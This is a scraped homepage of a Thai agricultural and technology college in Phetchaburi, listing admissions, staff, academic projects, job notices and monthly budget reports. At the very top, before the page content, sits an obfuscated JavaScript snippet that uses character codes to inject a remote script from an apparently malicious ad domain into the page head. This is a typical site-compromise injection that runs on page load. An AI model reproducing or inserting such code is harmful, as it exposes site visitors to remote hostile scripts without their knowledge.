Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,119,101,108,108,46,108,105,110,101,116,111,97,100,115,97,99,116,105,118,101,46,99,111,109,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})(); วิทยาลัยเกษตรและเทคโนโลยีเพชรบุรี – วิทยาลัยเกษตรและเทคโนโลยีเพชรบุรี
วิทยาลัยเกษตรและเทคโนโลยีเพชรบุรี
59 หมู่ 3 ต.สามพระยา อ.ชะอำ จ.เพชรบุรี 76120
จันทร์-ศุกร์: 08:30 - 16:30

เปิดรับสมัครนักศึกษาระดับปริญญาตรี

เปิดรับสมัครหลักสูตรเทคโนโลยีบัณฑิต ทล.บ ปีการศึกษา 2563
หลักสูตรเทคโนโลยีบัณฑิตระดับปริญญาตรี (2 ปีต่อเนื่อง) คุณสมบัติเฉพาะสาขา สาขาวิชาเทคโนโลยีการผลิตสัตว์ (ต่อเนื่อง) จำนวน 20 คน
อ่านต่อ..

เปิดรับสมัครเปิดรับสมัครนักศึกษาใหม่ ปี 2563
หลักสูตร ปวช. สาขาวิชา เกษตรศาสตร์, พณิชยการ (สาขางาน คอมพิวเตอร์ธุรกิจ) หลักสูตร ปวส. สาขาวิชา เกษตรศาสตร์, พืชศาสตร์, สัตวศาสตร์, เพาะเลี้ยงวัตว์น้ำ, การจัดการทั่วไป

(ปวช. เรียนฟรี ที่พักฟรี อาหารฟรี 3 มื้อ)
(พิเศษ สำหรับ ปวส. เรียนฟรี และฟรีค่าที่พัก)
อ่านต่อ..

นายนรินทร์ แก้วทอง

นายนรินทร์ แก้วทอง
ผู้อำนวยการวิทยาลัยเกษตรและเทคโนโลยีเพชรบุรี

ผลงานนักศึกษาคนเก่ง คนดี

รวมผลงานฝีมือนักเรียนนักศึกษาวิทยาลัยเกษตรและเทคโนโลยีเพชรบุรี ในการสร้างชื่อเสียงให้กับวิทยาลัยฯ

สภาพชุมชน เศรษฐกิจ สังคม

วิทยาลัยเกษตรและเทคโนโลยีเพชรบุรี สามารถเดินทางได้ทั้งทางรถไฟและทางรถยนต์ โดยมีระยะทางจากกรุงเทพถึงวิทยาลัยประมาณ 190 กิโลเมตร สามารถเดินทางเข้าสู่วิทยาลัย ฯ ได้หลายทางลักษณะทางสังคมและการเมือง ในพื้นที่ของวิทยาลัยเกษตรและเทคโนโลยีเพชรบุรี ตั้งอยู่ในเขตพื้นที่องค์การบริหารส่วนตำบลสามพระยาซึ่งนายกองค์การบริหารส่วนตำบลคือนายเล็ก ล้ำเลิศ เป็นศิษย์เก่าของวิทยาลัย ในหลักสูตรอาชีวศึกษาเพื่อการพัฒนาชนบท (อศ.กช.) และเนื่องจากวิทยาลัยเกษตรและเทคโนโลยีเพชรบุรี ตั้งอยู่ห่างจากตัวจังหวัดเพชรบุรีมาทางใต้ประมาณ 64 กิโลเมตร และมีอาณาเขตติดต่อกับอำเภอหัวหิน จังหวัดประจวบคีรีขันธ์ ทำให้วิทยาลัยต้องรับหน้าที่ให้บริการการศึกษาทั้งสองจังหวัดนี้เป็นส่วนใหญ่ ประชากรทั้งสองจังหวัด มีอาชีพหลักในด้านเกษตรกรรม การประมง การปศุสัตว์ รวมทั้งการค้าส่งและการค้าปลีก การอุตสาหกรรม การท่องเที่ยว และการบริการ

อ่านต่อ

แบบฟอร์มติดต่อเรา (Webmaster)

  ผลงานวิชาการของ วิทยาลัยเกษตรและเทคโนโลยีเพชรบุรี

  โครงงานวิทยาศาสตร์
  การศึกษาเรื่องใดเรื่องหนึ่งที่เป็นเรื่องเดียวกับวิทยาศาสตร์และเทคโนโลยี..
  งานวิจัย
  กระบวนการแสวงหาความรู้อันเป็นความจริงที่เชื่อถือได้ เป็นการศึกษาค้นคว้าของครูในชั้นเรียน..
  ชีววิถีเพื่อการพัฒนาอย่างยั่งยืน
  สิ่งประดิษฐ์ นำองค์ความรู้ปรัชญาเศรษฐกิจพอเพียง ผสมผสานกับ..
  สิ่งประดิษฐ์คนรุ่นใหม่
  นักเรียนนักศึกษา ระดับอาชีวศึกษา ได้มีการประดิษฐ์คิดค้นสร้างสรรผลงาน..
  สิ่งประดิษฐ์ อ.ก.ท.
  เพื่อพัฒนาคุณภาพชีวิต สังคมและสิ่งแวดล้อม สร้างชุมชนที่เข้มแข็ง และยั่งยืน..
  คุณรู้หรือไม่? วิทยาลัยเกษตรและเทคโนโลยีเพชรบุรี เปิดรับสมัครนักเรียน-นักศึกษาใหม่และเปิดสาขาวิชาใหม่คือ สาขาวิชา คอมพิวเตอร์ธุรกิจ

  กิจกรรมล่าสุด ดูกิจกรรมทั้งหมด

  Next Previous ข่าวประชาสัมพันธ์

  ผู้บริหาร และบุคลากร

  แนะนำคณะผู้บริหารของวิทยาลัยเกษตรและเทคโนโลยีเพชรบุรี คณะครูและเจ้าหน้าที่ เพิ่มเติม..

  เอกสารดาวน์โหลด

  รวมเอกสารสำหรับการเผยแพร่ของ วษท.เพชรบุรี

  เผยแพร่ : รายงานสรุปผลการดำเนินงาน ศูนย์บ่มเพาะผู้ประกอบการอาชีวศึกษา ประจำปีการศึกษา 2561 [PDF]

  รับสมัครบุคลเพื่อจ้างเป็นลูกจ้างชั่วคราวรายเดือน

  ข้อมูล : รับสมัครบุคลเพื่อจ้างเป็นลูกจ้างชั่วคราวรายเดือน ตำแหน่ง ครูพิเศษสอน 1 ตำแหน่ง (24 มิ.ย. 63) [PDF]
  ข้อมูล : ประกาศรายชื่อผู้ผ่านการเลือกสรรเพื่อจ้างเป็นลูกจ้างชั่วคราว ตำแหน่ง ครูอัตราจ้าง (13 มี.ค. 63) [PDF]
  ข้อมูล : ประกาศรายชื่อผู้มีสิทธิ์เข้ารับการสอบคัดเลือกบุคคลเพื่อจ้างเป็นลูกจ้างชั่วคราว ตำแหน่ง ครูอัตราจ้าง (11 มี.ค. 63) [PDF]
  ข้อมูล : สรรหาบุคคลเพื่อจ้างเป็นลูกจ้างชั่วคราว ตำแหน่งครูอัตราจ้าง (4 มี.ค. 63) [PDF]
  ข้อมูล : ประกาศรายชื่อผู้ผ่านการเลือกสรรเพื่อจ้างเป็นลูกจ้างชั่วคราวรายเดือน (13 ธ.ค. 62) [PDF]
  ข้อมูล : ประกาศรายชื่อผู้มีสิทธิ์เข้ารับการสอบคัดเลือกบุคคลเพื่อจ้างเป็นลูกจ้างชั่วคราวรายเดือน (11 ธ.ค. 62) [PDF]
  ข้อมูล : รับสมัครบุคลเพื่อจ้างเป็นลูกจ้างชั่วคราวรายเดือน ตำแหน่งเจ้าหน้าที่ธุรการ 2 ตำแหน่ง (2-9 ธ.ค. 62) [PDF]

  ไฟล์สรุปการใช้จ่ายในแต่ละเดือน

  งานการเงิน : งบทดลอง เดือน ก.พ. 2563 [DOC]

  งานการเงิน : งบทดลอง เดือน ม.ค. 2563 [DOC]

  งานการเงิน : งบทดลอง เดือน ธ.ค. 2562 [DOC]

  งานการเงิน : งบทดลอง เดือน ต.ค. 2562 [DOC]

  งานการเงิน : งบทดลอง เดือน ก.ย. 2562 [PDF]

  งานการเงิน : งบทดลอง เดือน ส.ค. 2562 [PDF]

  งานการเงิน : งบทดลอง เดือน ก.ค. 2562 [PDF]

  งานการเงิน : งบทดลอง เดือน มิ.ย. 2562 [PDF]

  งานการเงิน : งบทดลอง เดือน พ.ค. 2562 [PDF]

  งานการเงิน : งบทดลอง เดือน เม.ย. 2562 [PDF]

  งานการเงิน : งบทดลอง เดือน มี.ค. 2562 [PDF]

  งานการเงิน : งบทดลอง เดือน ก.พ. 2562 [PDF]

  งานการเงิน : งบทดลอง เดือน ม.ค. 2562 [PDF]

  งานการเงิน : งบทดลอง เดือน ธ.ค. 2561 [PDF]

  งานการเงิน : งบทดลอง เดือน พ.ย. 2561 [PDF]

  งานการเงิน : งบทดลอง เดือน ต.ค. 2561 [PDF]

  ยังไม่มี

  ...

  ไฟล์เอกสารเกี่ยวกับ งานประกันคุณภาพ

  SAR พ.ศ. 2562 [PDF]

  SAR พ.ศ. 2561 [PDF]

  SAR พ.ศ. 2560 [PDF]

  ยังไม่มี

  ...